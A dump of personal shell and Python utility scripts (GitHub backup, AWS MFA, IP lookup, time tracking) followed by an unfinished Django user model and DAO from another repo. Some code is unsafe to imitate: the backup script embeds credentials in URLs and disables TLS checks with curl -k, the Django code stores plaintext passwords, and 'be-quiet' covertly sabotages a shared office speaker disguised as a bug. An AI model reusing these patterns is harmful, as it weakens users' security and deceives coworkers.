"path": "/includes/aliases.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\nalias ls='ls -FGlAh'\n\nalias ecr_login='docker login -u AWS -p `aws ecr get-login-password` \"https://`aws sts get-caller-identity --query 'Account' --output text`.dkr.ecr.us-east-1.amazonaws.com\"'\n"
},
{
"alpha_fraction": 0.5794085264205933,
"alphanum_fraction": 0.5872581005096436,
"avg_line_length": 47.91071319580078,
"blob_id": "1e318bd9f191de1addef0c98f2d661981470fd40",
"content_id": "2aa3e18b0d5d130199912f627132c3fd2d762b22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 5478,
"license_type": "permissive",
"max_line_length": 174,
"num_lines": 112,
"path": "/bin/git-backup",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/zsh\n\n# A simple script to backup an organization's GitHub repositories, wikis, issues, and pull requests.\n# Sources: https://gist.github.com/darktim/5582423 https://gist.github.com/rodw/3073987\n\n[[ -z \"$1\" ]] && echo \"Please pass in an Organization or User\" && exit 1\n[[ -z \"$GHBU_UNAME\" ]] && echo \"Please set GHBU_UNAME\" && exit 1\n[[ -z \"$GHBU_PASSWD\" ]] && echo \"Please set GHBU_PASSWD\" && exit 1\n\nGHBU_BACKUP_DIR=${GHBU_BACKUP_DIR-\"github-backups\"} # where to place the backup files\nGHBU_ORG=$1 # the GitHub organization whose repos will be backed up\nGHBU_UNAME=$GHBU_UNAME # the username of a GitHub account (to use with the GitHub API)\nGHBU_PASSWD=$GHBU_PASSWD # the password for that account\nGHBU_GITHOST=${GHBU_GITHOST-\"https://${GHBU_UNAME}:${GHBU_PASSWD}@github.com\"} # the GitHub hostname (see notes)\nGHBU_PRUNE_OLD=${GHBU_PRUNE_OLD-false} # when `true`, old backups will be deleted\nGHBU_PRUNE_AFTER_N_DAYS=${GHBU_PRUNE_AFTER_N_DAYS-365} # the min age (in days) of backup files to delete\nGHBU_SILENT=${GHBU_SILENT-false} # when `true`, only show error messages\nGHBU_YES=${GHBU_YES-false} # when `true`, will skip prompts\nGHBU_API=${GHBU_API-\"https://api.github.com\"} # base URI for the GitHub API\nGHBU_GIT_CLONE_CMD=(\"git\" \"clone\" \"--quiet\" \"--mirror\" \"${GHBU_GITHOST}/\") # base command to use to clone GitHub repos\n\nTSTAMP=`date '+%Y-%m-%dT%H_%M_%S%z'`\n\n# The function `check` will exit the script if the given command fails.\nfunction check {\n \"$@\"\n exit_code=$?\n if [ $exit_code -ne 0 ]; then\n echo \"ERROR: Encountered error (${exit_code}) while running the following:\" >&2\n echo \" $@\" >&2\n echo \" (at line ${BASH_LINENO[0]} of file $0.)\" >&2\n echo \" Aborting.\" >&2\n exit $exit_code\n fi\n}\n\n# The function `tgz` will create a gzipped tar archive of the specified file ($1) and then remove the original\n# the option -P omits the error message tar: Removing leading '/' from member names\nfunction tgz {\n check tar zcPf $1.tar.gz $1 && check rm -rf $1\n}\n\n$GHBU_SILENT || (echo \"\" && echo \"=== INITIALIZING ===\" && echo \"\")\n\n$GHBU_SILENT || echo \"Using backup directory $GHBU_BACKUP_DIR\"\ncheck mkdir -p $GHBU_BACKUP_DIR\n\n$GHBU_SILENT || echo \"Fetching list of repositories for ${GHBU_ORG}...\"\n# cycling through pages as github API limits entries to 30/100 per page...\nPAGE=0\nwhile true; do\n let PAGE++\n $GHBU_SILENT || echo \"getting page ${PAGE}\"\n REPOLIST_TMP=\"`check curl --silent -u $GHBU_UNAME:$GHBU_PASSWD ${GHBU_API}/orgs/${GHBU_ORG}/repos\\?page=${PAGE}\\&per_page=10 -q -k | jq -r '.[] .name'`\"\n if [ -z \"${REPOLIST_TMP}\" ]; then break; fi\n for REPO in ${(f)REPOLIST_TMP}; do\n REPOLIST+=(\"$REPO\")\n done\ndone\n\n$GHBU_SILENT || echo -e \"found `echo $REPOLIST | wc -w` repositories.\"\nfor REPO in $REPOLIST; do\n [[ \"$GHBU_YES\" == true ]] && echo \" Will backup: $REPO\" && continue\n while true; do\n read \"?Do you want to backup '$REPO'? (y/n): \" RESPONSE\n if [[ $RESPONSE == 'y'* ]]; then\n BACKUP_REPOLIST+=(\"$REPO\")\n break\n elif [[ $RESPONSE == 'n'* ]]; then\n SKIP_REPOLIST+=(\"$REPO\")\n break\n else\n echo \"Please enter y or n\"\n fi\n done\ndone\n\n\necho \"Preparing to backup `echo $BACKUP_REPOLIST | wc -w | awk '{print $1}'` repos:\"\nfor REPO in $BACKUP_REPOLIST; do\n echo \"> $REPO\"\ndone\n\n$GHBU_SILENT || (echo \"\" && echo \"=== BACKING UP ===\" && echo \"\")\n\nfor REPO in $BACKUP_REPOLIST; do\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO}\"\n check ${GHBU_GIT_CLONE_CMD}${GHBU_ORG}/${REPO}.git ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}-${TSTAMP}.git \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}-${TSTAMP}.git\n\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO}.wiki (if any)\"\n ${GHBU_GIT_CLONE_CMD}${GHBU_ORG}/${REPO}.wiki.git ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.wiki-${TSTAMP}.git 2>/dev/null \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.wiki-${TSTAMP}.git\n\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO} pulls\"\n check curl --silent -u $GHBU_UNAME:$GHBU_PASSWD \"${GHBU_API}/repos/${GHBU_ORG}/${REPO}/pulls?state=all\" -q > ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.pulls-${TSTAMP}.json \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.pulls-${TSTAMP}.json\n\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO} issues\"\n check curl --silent -u $GHBU_UNAME:$GHBU_PASSWD \"${GHBU_API}/repos/${GHBU_ORG}/${REPO}/issues?state=all\" -q > ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.issues-${TSTAMP}.json \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.issues-${TSTAMP}.json\ndone\n\nif $GHBU_PRUNE_OLD; then\n $GHBU_SILENT || (echo \"\" && echo \"=== PRUNING ===\" && echo \"\")\n $GHBU_SILENT || echo \"Pruning backup files ${GHBU_PRUNE_AFTER_N_DAYS} days old or older.\"\n $GHBU_SILENT || echo \"Found `find $GHBU_BACKUP_DIR -name '*.tar.gz' -mtime +$GHBU_PRUNE_AFTER_N_DAYS | wc -l` files to prune.\"\n find $GHBU_BACKUP_DIR -name '*.tar.gz' -mtime +$GHBU_PRUNE_AFTER_N_DAYS -exec rm -fv {} > /dev/null \\;\nfi\n\n$GHBU_SILENT || (echo \"\" && echo \"=== DONE ===\" && echo \"\")\n$GHBU_SILENT || (echo \"GitHub backup completed.\" && echo \"\")\n"
},
{
"alpha_fraction": 0.5439519286155701,
"alphanum_fraction": 0.5533433556556702,
"avg_line_length": 37.5797119140625,
"blob_id": "e8e16201c7155b6c7dfbc99a5d5fd657df9053f3",
"content_id": "ad779f302baf8db523c5ed7e5882e27871a7f418",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2662,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 69,
"path": "/bin/aws-mfa-session",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Create a session using an MFA device for the AWS CLI\n#\n# Usage:\n# aws-mfa-session -o <OUTPUT PROFILE NAME> -c <OTP CODE>\n#\n# Options:\n# -h|--help show this help menu\n# -d|--device <ARN> AWS MFA device ARN\n# -s|--save <NAME> save the session to a named profile instead of returning the JSON info\n# -p|--profile <NAME> profile to use when creating the session\n# -t|--topt <TOTP> time-based one time password code\n\nAWS_MFA_SESSION_SCRIPT_PATH=\"$0\"\n\naws_mfa_session_help() {\n sed '/^#\\!.*/d' $AWS_MFA_SESSION_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\naws_mfa_session() {\n local profile=\"default\" \\\n totp_code \\\n save \\\n device_arn \\\n mfa_device_info \\\n session_info \\\n access_key_id \\\n secret_access_key \\\n session_token opt\n\n while true; do\n case \"$1\" in\n -h|--help|help|h) aws_mfa_session_help && exit 0;;\n -d|--device) [[ \"$2\" == \"\" ]] && echo \"-d requires an argument\" && exit 1 || mfa_device_arn=\"$2\" && shift 2;;\n -s|--save ) [[ \"$2\" == \"\" ]] && echo \"-o requires an argument\" && exit 1 || save=\"$2\" && shift 2;;\n -p|--profile ) [[ \"$2\" == \"\" ]] && echo \"-p requires an argument\" && exit 1 || profile=\"$2\" && shift 2;;\n -t|--topt ) [[ \"$2\" == \"\" ]] && echo \"-t requires an argument\" && exit 1 || totp_code=\"$2\" && shift 2;;\n * ) break;;\n esac\n done\n\n [ $totp_code -z ] && read \"?Enter TOTP Code: \" totp_code\n if [ $mfa_device_arn -z ]; then\n mfa_device_info=$(aws iam list-mfa-devices --profile $profile)\n [ $? != 0 ] && echo \"$mfa_device_info\" && exit 1\n mfa_device_arn=$(echo $mfa_device_info | jp -u \"MFADevices[0].SerialNumber\")\n [ $? != 0 ] && echo \"$mfa_device_arn\" && exit 1\n fi\n\n session_info=$(aws sts get-session-token --serial-number $mfa_device_arn --token-code $totp_code --profile $profile)\n\n if [ $save ]; then\n access_key_id=$(echo $session_info | jp -u \"Credentials.AccessKeyId\")\n secret_access_key=$(echo $session_info | jp -u \"Credentials.SecretAccessKey\")\n session_token=$(echo $session_info | jp -u \"Credentials.SessionToken\")\n\n aws configure set aws_access_key_id $access_key_id --profile $save\n aws configure set aws_secret_access_key $secret_access_key --profile $save\n aws configure set aws_session_token $session_token --profile $save\n aws configure set region us-east-1 --profile $save\n\n echo $save\n else\n echo $session_info\n fi\n}\n\naws_mfa_session $@\n"
},
{
"alpha_fraction": 0.5511064529418945,
"alphanum_fraction": 0.5535651445388794,
"avg_line_length": 29.287233352661133,
"blob_id": "f50a1bee9f8b874d44ac9bde11161344c4207984",
"content_id": "cc07abd3950f41ef71fce88fb619adc12ea922d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2847,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 94,
"path": "/bin/ip",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"Display IP addresses assigned to various network interfaces.\n\nUsage:\n ip\n ip (-i | --interface) <NAME>\n ip (-h | --help)\n ip --version\n\nOptions:\n -h --help Show this screen.\n --version Show version.\n -i --interface INTERFACE Show specific interface address.\n -a --all Show all interface addresses.\n -v --verbose Display additional information for interface.\n\n\"\"\"\n\n# from docopt import docopt\n\n# if __name__ == '__main__':\n# arguments = docopt(__doc__, version='ip 1.0')\n# print(arguments)\n\nimport argparse\nimport netifaces\n\nfrom os import name\nfrom os import popen\n\ndescription=\"List IP addresses for interfaces.\"\nargparser = argparse.ArgumentParser(description=description)\nargparser.add_argument(\"-l, --list\",\n dest=\"list\",\n action=\"store_true\",\n help=\"list all interfaces\")\nargparser.add_argument(\"-i, --interfaces\",\n dest=\"interfaces\",\n help=\"list a subset of interfaces\")\nargparser.add_argument(\"-v, --verbose\",\n dest=\"verbose\",\n action=\"store_true\",\n help=\"show labels for each interface\")\noptions = argparser.parse_args()\n\n# Default to show just wan address\ninterfaces = ['wan']\nif options.interfaces and options.list:\n print(\"Error: you may not use the '-i' and '-l' options together\")\nelif options.list:\n interfaces = ['wan']+netifaces.interfaces()\nelif options.interfaces:\n interfaces = options.interfaces.split(' ')\n\n# Loop through passed interfaces\nfor interface in interfaces:\n\n # don't show localhost address\n if interface == 'lo0':\n continue\n\n # Get WAN address\n if interface == 'wan':\n if name == 'posix':\n wan = popen(\n \"dig +short myip.opendns.com @resolver1.opendns.com\").read().strip()\n else:\n # Windows doesn't have dig\n import urllib2\n req = urllib2.Request('https://ifconfig.co/ip')\n response = urllib2.urlopen(req)\n wan = response.read().strip()\n\n # Print and exit\n if options.verbose:\n print(\"wan: %s\" % (wan))\n else:\n print(wan)\n\n # Get other interface addresss info\n else:\n try:\n interfaceInfo = netifaces.ifaddresses(interface)\n if netifaces.AF_INET in interfaceInfo:\n for i in interfaceInfo[netifaces.AF_INET]:\n if 'addr' in i:\n if options.verbose:\n print(\"%s: %s\" % (interface, i['addr']))\n else:\n print(i['addr'])\n\n except Exception as e:\n print(\"Error: (%s) %s\" % (interface, e))\n"
},
{
"alpha_fraction": 0.5379388332366943,
"alphanum_fraction": 0.5390713214874268,
"avg_line_length": 26.59375,
"blob_id": "fd3fc02a275cf2ffe621510add4e3e2d1171ab13",
"content_id": "609010c31a3c17e08ac2982fd34ffdf2c1e67dc6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 883,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 32,
"path": "/includes/search.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\nsearch() {\n local _query _engine _arg\n _engine='google'\n for _arg in $@; do\n if [ $_arg = '-e' ]; then\n _engine=\"$2\"\n shift; shift\n fi\n done\n\n case $_engine in\n 'google') _engine='https://www.google.com/search?q=';;\n 'duckduckgo') _engine='https://duckduckgo.com/?q=';;\n 'stackoverflow') _engine='https://stackoverflow.com/search?q=';;\n esac\n\n _query=`echo \"$*\" | sed -e 's/\\ /+/g'`\n [[ $_query ]] || _query=$(basename `pwd`)\n\n case \"`uname -s`\" in\n \"Darwin\") open \"$_engine$_query\";;\n \"Linux\") xdg-open \"$_engine$_query\";;\n \"CYGWIN\"|\"MINGW\") start chrome \"$_engine$_query\";;\n esac\n}\n\n# Quick search aliases\nalias ggl=\"search -e google\" # Google\nalias ddg=\"search -e duckduckgo\" # DuckDuckGo\nalias sov=\"search -e stackoverflow\" # Stack Overflow\n"
},
{
"alpha_fraction": 0.7594936490058899,
"alphanum_fraction": 0.7594936490058899,
"avg_line_length": 38.5,
"blob_id": "b576a6c355f5c059c1780fc27dbde35994d8b8c2",
"content_id": "3812b075ccf3a4ed5b4d5288a67579881ed26b41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 2,
"path": "/includes/lynx.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "export WWW_HOME=\"https://duckduckgo.com\"\nalias lynx=\"lynx -accept_all_cookies\"\n"
},
{
"alpha_fraction": 0.6296980977058411,
"alphanum_fraction": 0.6438694000244141,
"avg_line_length": 35.06666564941406,
"blob_id": "16815668f5aa772a77000a56b2146c6b83394a8d",
"content_id": "fe6b5594a78696f7efb32b3a44e4cdd20708ad7a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1623,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 45,
"path": "/bin/be-quiet",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/zsh\n\n# Changes the volume of Sonos to a specific level (default 0) over a period of time, because playing music in an open\n# office is rude. Randomizes the delay to make it seem like a network error or software bug. Note: you can also have it\n# slowly increment up to a certain volume, which can be useful for sabatoging music playing privilege.\n\nbe_quiet() {\n local target_volume=${1:-0}\n local current_volume=100\n local min_delay=${2:-60}\n while true; do\n local zone=`sonos-cli list-zones | head -n1`\n [ $? -ne 0 ] && continue\n current_volume=`sonos-cli volume --zone $zone`\n [ $? -ne 0 ] && continue\n echo \"`be_quiet_timestamp`: Current volume is $current_volume in zone $zone\"\n local volume_delta=$(($current_volume - $target_volume))\n local volume_adjustment=`be_quiet_clamp_value $(( $volume_delta / 5 )) -5 5`\n local new_volume=$(($current_volume - $volume_adjustment))\n local random=$(( RANDOM % 1000 ))\n local delay=$(($min_delay + $random))\n if [[ $current_volume -ne $target_volume ]]; then\n echo \"`be_quiet_timestamp`: Setting volume to $new_volume in zone $zone\"\n sonos-cli volume $new_volume --zone $zone\n [ $? -ne 0 ] && continue\n else\n echo \"`be_quiet_timestamp`: Volume is at target of $target_volume in zone $zone\"\n fi\n echo \"`be_quiet_timestamp`: Waiting $delay seconds\"\n sleep $delay\n done\n}\n\nbe_quiet_timestamp() {\n date -u +\"%Y-%m-%dT%H:%M:%SZ\"\n}\n\nbe_quiet_clamp_value() {\n local value=$1 min=$2 max=$3\n value=$(( $value < $min ? $min : $value ))\n value=$(( $value > $max ? $max : $value ))\n echo $value\n}\n\nbe_quiet $@\n"
},
{
"alpha_fraction": 0.5795148015022278,
"alphanum_fraction": 0.6307277679443359,
"avg_line_length": 25.5,
"blob_id": "e8dfb96fdc61868db44b2d7a164921d819488324",
"content_id": "6c30209c5d299691e4781e4ecfd1ab0e409c7a30",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 14,
"path": "/bin/strtotime",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport time\nfrom datetime import datetime\nfrom dateutil import tz\n\n# [25/Jan/2018:03:54:40-0500]\nif len(sys.argv) > 1:\n time_string = sys.argv[1].replace('[', '').replace(']', '').split(' -')[0]\n d = datetime.strptime(time_string, '%d/%b/%Y:%H:%M:%S')\n print(int(d.timestamp()))\nelse:\n print('Must pass a valid time string')\n"
},
{
"alpha_fraction": 0.4798828065395355,
"alphanum_fraction": 0.49335938692092896,
"avg_line_length": 33.328857421875,
"blob_id": "505d8f7c1e1db051221ffa9d35e5823fb6ab097a",
"content_id": "03f99745223aca8c93fcbe17ff2c8b243cfa7ed0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 5120,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 149,
"path": "/bin/hay",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Setup hay directory and hay bail path\nHAYDIR=$HOME/.hay\n! [ -d $HAYDIR ] && mkdir -p $HAYDIR\n! [ -f $$HAYDIR/config ] && touch $HAYDIR/config\nsource $HAYDIR/config\nif ! [[ \"$HAYBAIL\" ]]; then\n read -p \"Enter path for haybail.txt file: \" HAYBAIL\n echo \"export HAYBAIL=${HAYBAIL:-$HOME/haybail.txt}\" >> $HAYDIR/config\n source $HAYDIR/config\nfi\nHAYBAILDIR=`dirname $HAYBAIL`\n! [ -d $HAYBAILDIR ] && echo \"$HAYBAILDIR does not exist\" && exit 1\n! [ -f $HAYBAIL ] && touch $HAYBAIL\n\n# Get last line of haybail\n__last_line=`wc -l < $HAYBAIL | xargs`\n\nconfirm() {\n [[ $_auto_yes ]] && return 1\n [[ $_silent ]] && return 0\n # example: confirm \"Do the thing?\" && [ \"$?\" == 0 ] && exit 1\n while true; do\n read -r -p \"${1:-Are you sure?} [y/n]: \" RESP\n case $RESP in\n [yY][eE][sS]|[yY]) return 1;;\n [nN][oO]|[nN]) return 0;;\n *) echo \"Please enter y(es) or n(o)\";;\n esac\n done\n}\n\nif [[ \"$1\" ]]; then\n _CMD=\"$1\" && shift\nelse\n _CMD=\"list\"\nfi\ncase $_CMD in\n # 't'|'today' )\n # hay list `date +%Y-%m-%d`\n # ;;\n 'ls'|'list' )\n if ! [[ \"$@\" ]]; then\n cat -n $HAYBAIL\n else\n __results=`grep -in --color=always \"$@\" $HAYBAIL`\n ! [[ \"$__results\" ]] && echo \"No results found for '$@' in $HAYBAIL\" && exit 0\n echo \"$__results\" | sed 's/:/ /;' | awk '{printf \"%6s\",$1; $1=\" \"; print $0}'\n fi\n ;;\n 'l'|'last' )\n echo \"$(printf '%6s' `wc -l < $HAYBAIL`) `tail -n1 $HAYBAIL`\"\n ;;\n 's'|'start' )\n __start=\"start:`date +%s`\"\n if [[ \"$@\" ]]; then\n __HAY=\"$@ \"\n else\n read -p \"Hay started: \" __HAY\n __HAY=\"`echo $__HAY | sed -e 's/\\n//g'`\"\n [[ \"$__HAY\" ]] && __HAY=\"$__HAY \" # Add a space to the end if not empty\n confirm \"End hay now?\" && [ \"$?\" == 0 ] && __end=\" end:`date +%s`\"\n fi\n echo \"$__HAY$__start$__end\" >> $HAYBAIL\n ;;\n 'e'|'end' )\n if [[ $1 =~ ^[0-9]+$ ]]; then\n if [[ $1 -lt $__last_line ]]; then\n __line_num=$1\n else\n echo \"Cannot edit line $1 of $HAYBAIL because it is only $__last_line lines long\" && exit 1\n fi\n elif [[ \"$1\" ]]; then\n echo \"Enter a whole integer to edit a specific line\" && exit 1\n else\n __line_num=$__last_line\n fi\n __line=`sed \"$__line_num\"\"q;d\" $HAYBAIL`\n if [[ \"$__line\" == *'end:'* ]]; then\n __ended=$(date -r `echo $__line | grep -o end:.* | cut -d \\: -f 2` +%Y-%m-%d\\ at\\ %H:%M\\ %p)\n echo \"Line $__line_num was already ended on $__ended\" && exit 1\n fi\n __new=\"$__line end:`date +%s`\"\n __new_escaped=$(echo $__new | sed -e 's/\\\\/\\\\\\\\/g; s/\\//\\\\\\//g; s/&/\\\\\\&/g')\n sed -i.tmp \"$__line_num\"\"s/.*/$__new_escaped/\" $HAYBAIL\n echo -e \"Edited $HAYBAIL:$__line_num\\n\\x1B[31m- $__line\\n\\x1B[32m+ $__new\\x1B[0m\"\n ;;\n 'c'|'contexts' )\n __contexts=`grep -on '@[a-zA-Z0-9_]*' $HAYBAIL`\n __contexts_counts=`echo \"$__contexts\" | cut -d \\: -f 2 | sort | uniq -c | awk '{print $2\":\"$1}'`\n for __context in $__contexts_counts; do\n __mentions=$(echo \"$__contexts\" | grep \"`echo $__context | cut -d \\: -f 1`\" | cut -d \\: -f1 | tr '\\n' ',')\n echo \"$__context ($__mentions)\" | sed 's/,)/) /g'\n done\n ;;\n 'p'|'projects' )\n __projects=`grep -on '+[a-zA-Z0-9_]*' $HAYBAIL`\n __projects_counts=`echo \"$__projects\" | cut -d \\: -f 2 | sort | uniq -c | awk '{print $2\":\"$1}'`\n for __tag in $__projects_counts; do\n __mentions=$(echo \"$__projects\" | grep \"`echo $__tag | cut -d \\: -f 1`\" | cut -d \\: -f1 | tr '\\n' ',')\n echo \"$__tag ($__mentions)\" | sed 's/,)/) /g'\n done\n ;;\n 'archive' )\n if [[ $@ == *'list'* ]] || [[ $@ == *'ls'* ]]; then\n find `dirname $HAYBAIL/` -name *\"$(basename `echo $HAYBAIL | sed 's/\\.txt//g'`)-\"* -maxdepth 1\n else\n __archive_name=\"`echo $HAYBAIL | sed 's/\\.txt//g'`-`date +%s`.txt\"\n mv $HAYBAIL \"$__archive_name\"\n echo \"Archived $HAYBAIL to $__archive_name\"\n fi\n ;;\n 'e'|'edit' )\n if [[ $1 =~ ^[0-9]+$ ]]; then\n if [[ $1 -lt $__last_line ]]; then\n __line_num=$1\n else\n echo \"Cannot edit line $1 of $HAYBAIL because it is only $__last_line lines long\" && exit 1\n fi\n elif [[ \"$1\" ]]; then\n echo \"Enter a whole integer to edit a specific line\" && exit 1\n else\n __line_num=$__last_line # Default to editing last line\n fi\n __line=`sed \"$__line_num\"\"q;d\" $HAYBAIL`\n\n # Experimental inline editor using Python\n # __new=`python -c \"import readline; readline.set_startup_hook(lambda: readline.insert_text('$__line')); input('');\"`\n\n # Good old nano\n __tmp_file=`mktemp`\n echo \"$__line\" > $__tmp_file\n nano $__tmp_file\n __new=`cat $__tmp_file | sed -e 's/\\n//g' | tr -d '\\n'`\n\n # Save new line to $HAYBAIL\n if [[ \"$__new\" == \"$__line\" ]]; then\n echo \"Nothing to save (no changes made to $__line)\"\n else\n __new_escaped=$(echo $__new | sed -e 's/\\\\/\\\\\\\\/g; s/\\//\\\\\\//g; s/&/\\\\\\&/g')\n sed -i.tmp \"$__line_num\"\"s/.*/$__new_escaped/\" $HAYBAIL\n echo -e \"Edited $HAYBAIL:$__line_num\\n\\x1B[31m- $__line\\n\\x1B[32m+ $__new\\x1B[0m\"\n fi\n ;;\n * )\n echo \"HELP\"\n ;;\nesac\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6120448112487793,
"alphanum_fraction": 0.6484593749046326,
"avg_line_length": 24.5,
"blob_id": "344ddb70c9f2fe5a3c12dd1dcd35883fd0bbcfc5",
"content_id": "1645f518fb48a5665ff12579d2def1f84865acc1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 714,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 28,
"path": "/bin/work",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# This script helps you do hackerish stuff\n# Source: https://gist.github.com/timfallmk/32dca5c7f2a9eef8a34e4d1e7873ef30\n\nif [ \"$EUID\" -ne 0 ]\nthen\n echo \"Please run as root to be hackerish.\"\n exit\nfi\n\n# turn off globbing\nset -f\n# split on newlines only for for loops\nIFS='\n'\nfor log in $(find /var/log -type f); do\n # only use the log if it's a text file; we _will_ encounter some archived logs\n if [ `file $log | grep -e text | wc -l` -ne 0 ]\n then\n echo $log\n for line in $(cat $log); do\n echo $line\n # sleep for a random duration between 0 and 1/4 seconds to indicate hard hackerish work\n bc -l <<< $(bc <<< \"$RANDOM % 10\")\" / 40\" | xargs sleep\n done\n fi\ndone\n"
}
] | 31 |
lao605/zzc
|
https://github.com/lao605/zzc
|
406055c532382c196b940713fbdf17dfc940e8fa
|
611fade994d8c36a202c822a3e09468c317f2630
|
16fd54fec8011535c01ebd7f8532dbbf525ddc0f
|
HEAD
| 2016-08-03T17:22:52.668685 | 2015-12-13T08:43:55 | 2015-12-13T08:43:55 | 25,157,504 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7004525065422058,
"alphanum_fraction": 0.7085973024368286,
"avg_line_length": 20.66666603088379,
"blob_id": "54f8f54cf1a70a3a66a2d5e0bf484d80bb0d8d6d",
"content_id": "a490c5a90689a5b2c2a2679dab334364a6fd0520",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 51,
"path": "/zzc/adam2014/DAO/UserDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import User\n\nimport datetime\n\ndef insertUser(**user):\n u = User.objects.create(**user)\n return u;\n\ndef deleteUser(id):\n User.objects.get(id=id).delete()\n\ndef getUserById(id):\n return User.objects.get(id=id)\n\ndef getUserByCode(code):\n return User.objects.get(code=code)\n\ndef getUserByPhone(phone):\n return User.objects.get(phone=phone)\n\ndef updateUser(**kw):\n User.objects.filter(id=kw['id']).update(**kw)\n\ndef validateUserByPhone(phone,password):\n\tresult = User.objects.filter(phone=phone,password=password)\n\treturn (len(result) == 1)\n\ndef validateUserByCode(code,password):\n\tresult = User.objects.filter(code=code,password=password)\n\treturn (len(result) == 1)\n\ndef validateVersion(version):\n\tpass\n\ndef validateExistPhone(phone):\n result = User.objects.filter(phone=phone)\n return (len(result) == 1)\n\ndef validateExistCode(code):\n result = User.objects.filter(code=code)\n return (len(result) == 1)\n"
},
{
"alpha_fraction": 0.5602098703384399,
"alphanum_fraction": 0.5624231696128845,
"avg_line_length": 32.33333206176758,
"blob_id": "b980e0ea80ff5ccc33b86839e98b96c2ca52fb0d",
"content_id": "c167ecfd53aa019faa999283f1f31c00efc45a6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12211,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 366,
"path": "/zzc/adam2014/models.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db.models.fields import files\nfrom django.db import models\nimport datetime\n\n# Create your models here.\nclass User(models.Model):\n password = models.CharField(max_length=16)\n nickname = models.CharField(max_length=32)\n #定义photo存储路径\n photo = models.FileField(upload_to = './static/upload/photo/')\n phone = models.CharField(max_length=16)\n contacts_version = models.CharField(max_length=15,null=True)\n longitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n latitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n code = models.CharField(max_length=20)\n\n def __unicode__(self):\n return str(self.id)+' '+self.nickname +' '+self.code+' '+self.phone+' '+str(self.contacts_version)\\\n +' '+str(self.longitude)+' '+str(self.latitude)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\n\nclass Group(models.Model):\n name = models.CharField(max_length=32)\n ucount = models.IntegerField()\n code = models.CharField(max_length=20)\n users = 